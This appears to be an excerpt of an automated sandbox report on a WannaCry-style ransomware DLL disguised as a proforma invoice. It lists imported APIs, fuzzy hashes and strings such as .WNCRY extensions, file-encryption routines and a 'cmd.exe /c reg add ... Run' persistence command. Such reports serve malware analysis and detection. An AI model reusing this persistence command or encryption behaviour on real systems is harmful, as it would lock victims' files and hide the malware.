                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                            • API String ID: 2238633743-2459060434
                                                            • Opcode ID: b363998bde18683af009ee46e1ce10118f5fbe9ee4d3bceef1b0164aeb75d0ff
                                                            • Instruction ID: 8acda46cc026f7592c4ee70142fb235f08bec8b36f89472f51a8b593d463a20b
                                                            • Opcode Fuzzy Hash: b363998bde18683af009ee46e1ce10118f5fbe9ee4d3bceef1b0164aeb75d0ff
                                                            • Instruction Fuzzy Hash: 781121B0643761A7FB54FB6A9C94FEE3694EBC42D1302002BE9019315DDF649841CB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006959
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006969
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006A54
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006A64
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006B1F
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B2F
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8D0), ref: 10006B85
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B95
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: 2f6f863f4f1b27604bc7f9c16208b3bc369cdb7356135f5c50d3af07c9db71d3
                                                            • Instruction ID: 059c23d85c393ba9fd365f6bea795e9a80031673541d73dce98a36ed974061eb
                                                            • Opcode Fuzzy Hash: 2f6f863f4f1b27604bc7f9c16208b3bc369cdb7356135f5c50d3af07c9db71d3
                                                            • Instruction Fuzzy Hash: FD6182357042528BE704DF299C909ABB7E7FBCD284F15867DEC89A7209CB31AA05CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,75AA3310,75AA3310,10003D9E,?,75AA3310,00000000), ref: 10003A9D
                                                              • Part of subcall function 10003F00: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
                                                              • Part of subcall function 10003F00: GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
                                                              • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10004017
                                                            • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,75AA3310,00000000), ref: 10003E2B
                                                            • _local_unwind2.MSVCRT ref: 10003E3B
                                                            • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,?,?,?,75AA3310,00000000), ref: 10003E70
                                                            • strncmp.MSVCRT(00000000,75AA3310,?,?,?,?,?,75AA3310,00000000), ref: 10003EA1
                                                            • _local_unwind2.MSVCRT ref: 10003EB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                            • String ID: TESTDATA
                                                            • API String ID: 154225373-1607903762
                                                            • Opcode ID: 5841e8cc0e4b8ef1c8e0f906ed67527bce7dcc068ddb21026a2c4ed6748e33c7
                                                            • Instruction ID: a032fc21090523e0544b4f1491e0cf73a7f188879e4d6ad20d27030e122f8292
                                                            • Opcode Fuzzy Hash: 5841e8cc0e4b8ef1c8e0f906ed67527bce7dcc068ddb21026a2c4ed6748e33c7
                                                            • Instruction Fuzzy Hash: E5513E75900258ABE714CB64DC85BEBB7B8FB48360F1087ADF919D72C5EB709A44CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 10005DDF
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005DEF
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E18
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E28
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E51
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E61
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,7598F130), ref: 1000139C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,7598F130,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
                                                            • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 1000629A
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 100062AA
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006659
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006669
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CryptRandom
                                                            • String ID:
                                                            • API String ID: 2662593985-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                            • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                            • API String ID: 2817753184-2255769345
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,7598A710,10005BA1), ref: 10003433
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 10003450
                                                            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 1000345D
                                                            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 1000346A
                                                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 10003477
                                                            • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 10003484
                                                            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 10003491
                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 1000349E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                            • API String ID: 2238633743-1294736154
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$wcsrchr
                                                            • String ID: .WNCRY$.WNCRYT$.WNCYR$.dll$.exe
                                                            • API String ID: 2496260227-3981601049
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 10005094
                                                            • wcslen.MSVCRT ref: 100050A1
                                                            • wcslen.MSVCRT ref: 100050AB
                                                            • wcslen.MSVCRT ref: 100050B9
                                                            • swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
                                                            • sprintf.MSVCRT ref: 100050FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: wcslen$Directory$CreatePathTempWindowssprintfswprintf
                                                            • String ID: $RECYCLE$$RECYCLE$%C:\%s$attrib +h +s %C:\%s
                                                            • API String ID: 3936433386-879418404
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InterlockedExchangeAdd.KERNEL32(1000D4E4,00000000), ref: 1000557E
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 100055AE
                                                            • Sleep.KERNEL32(000003E8), ref: 100055CB
                                                            • GetDriveTypeW.KERNEL32(?), ref: 100055E9
                                                            • GetDriveTypeW.KERNEL32(00000000,00000000,00000019,75AA3300,00000000), ref: 100055FD
                                                            • InterlockedExchange.KERNEL32(1000D4E4,?), ref: 1000560A
                                                            • GetDriveTypeW.KERNEL32(?), ref: 10005615
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DriveType$ExchangeInterlocked$DiskFreeSleepSpace
                                                            • String ID: :\
                                                            • API String ID: 3294574733-2155371604
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100014AE
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: rand$wcslen$ComputerNamesrand
                                                            • String ID: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                            • API String ID: 3058258771-3674288975
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000386E
                                                            • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 10003876
                                                            • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 100038AD
                                                            • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 100038BA
                                                            • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 100038C2
                                                            • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 100038F9
                                                            • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000393A
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                            • String ID:
                                                            • API String ID: 2613176527-0
                                                            • Opcode ID: 419391cea48095fa9c56488878e65c16131f7775e920f671397da16b97c4db23
                                                            • Instruction ID: c1de8fb6cb3a72026dff4bd4d186f336055b31e35bdbf535d2fbb9e5f9aed039
                                                            • Opcode Fuzzy Hash: 419391cea48095fa9c56488878e65c16131f7775e920f671397da16b97c4db23
                                                            • Instruction Fuzzy Hash: 3C41E171A00B518FD711DF1DC8C4A9AF7E6FB89790B50C85EE49A87399CB35A841CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BBB
                                                              • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BD0
                                                              • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,75AA3310,10003EFD,10003EE0,?,?,?,?,?,?,?,75AA3310,00000000), ref: 10003BE7
                                                            • GlobalFree.KERNEL32(?), ref: 10001797
                                                            • GlobalFree.KERNEL32(?), ref: 100017C0
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,100016B2,75AA0F00,75AA2EE0,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 100017E3
                                                            • CloseHandle.KERNEL32(?), ref: 100017F0
                                                            • DeleteCriticalSection.KERNEL32(?,?,00000000,100016B2,75AA0F00,75AA2EE0,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 10001807
                                                            • wcslen.MSVCRT ref: 10001814
                                                            • DeleteFileW.KERNEL32(?,75AA0F10), ref: 10001822
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt$DeleteDestroyFreeGlobal$CloseContextCriticalFileHandleObjectReleaseSectionSingleWaitwcslen
                                                            • String ID:
                                                            • API String ID: 1629502191-0
                                                            • Opcode ID: 33c5ca710b395fa90b6c0262d6d3b5fcc069b9a43ede1909023ffbbaa47dbda2
                                                            • Instruction ID: f586c4f20a923c2549891f38ad5cae4d46359d9a66e1c91433b4026ce85e5b09
                                                            • Opcode Fuzzy Hash: 33c5ca710b395fa90b6c0262d6d3b5fcc069b9a43ede1909023ffbbaa47dbda2
                                                            • Instruction Fuzzy Hash: 6D114CB45056118BF351EB38C888BD7B7E8FF44284F01451DE69E97294CFB4A8448BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,7598F130), ref: 1000139C
                                                            • sprintf.MSVCRT ref: 10004863
                                                            Strings
                                                            • M, xrefs: 10004819
                                                            • L, xrefs: 10004814
                                                            • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100047FD
                                                            • cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f, xrefs: 1000485D
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AllocateInitializesprintf
                                                            • String ID: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run$L$M$cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f
                                                            • API String ID: 568869838-3541944315
                                                            • Opcode ID: bf5c0829c5f729f0c32795c81225613645d0478752b7bd72f04b3b82bf7e2ebe
                                                            • Instruction ID: cb81d63c27e7438ee873a6580c8d427ba87cf58f5dd356eba86e26e33131f037
                                                            • Opcode Fuzzy Hash: bf5c0829c5f729f0c32795c81225613645d0478752b7bd72f04b3b82bf7e2ebe
                                                            • Instruction Fuzzy Hash: 67012471508380BAF354D318C840BEF7BA8DFC5388F408C2EBAC887295DAB59548C7A3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: wcscat$DeleteFile
                                                            • String ID: .WNCYR
                                                            • API String ID: 2874565005-3780910188
                                                            • Opcode ID: 89d4098d6f193e1b9fa4b3174060334de28b51d85d2f5b150166bc60bd8e7cb4
                                                            • Instruction ID: a3bc17cf7ef854a2158c8400b310fe5ef82d5dee7fb413dfc94f73b9db8610d0
                                                            • Opcode Fuzzy Hash: 89d4098d6f193e1b9fa4b3174060334de28b51d85d2f5b150166bc60bd8e7cb4
                                                            • Instruction Fuzzy Hash: FEF0C83221011067F360E75CDC40FDF6298EFD53A0F010417F244D2148C7A4A94287A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 100011D0: GetCurrentProcess.KERNEL32 ref: 100011E4
                                                              • Part of subcall function 100011D0: OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
                                                            • GetUserNameW.ADVAPI32 ref: 10001321
                                                            • _wcsicmp.MSVCRT ref: 10001331
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentNameOpenTokenUser_wcsicmp
                                                            • String ID: S-1-5-18$SYSTEM
